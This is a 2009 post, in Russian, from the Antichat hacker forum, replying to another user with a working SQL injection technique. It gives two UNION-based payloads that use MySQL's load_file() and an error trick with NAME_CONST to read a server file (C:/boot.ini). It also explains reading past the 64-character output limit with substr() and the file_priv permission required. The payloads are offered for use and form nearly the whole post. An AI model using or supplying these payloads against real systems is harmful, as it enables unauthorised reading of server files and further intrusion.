21.11.2009, 20:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
2 InFlame
чтение файлов возможно, используй load_file(). Естественно для успешного чтения юзер под которым работает бд должен иметь file_priv = Y
SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST(load_file('C:/boot.ini'),1)d) as t JOIN (SELECT NAME_CONST(load_file('C:/boot.ini'),1)e)b)a
вывод режется до 64 символов
остальные символы читаем с помощью функции substr()
SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST(substr(load_file('C:/boot.ini'),63),1)d) as t JOIN (SELECT NAME_CONST(substr(load_file('C:/boot.ini'),63),1)e)b)a
|
|
|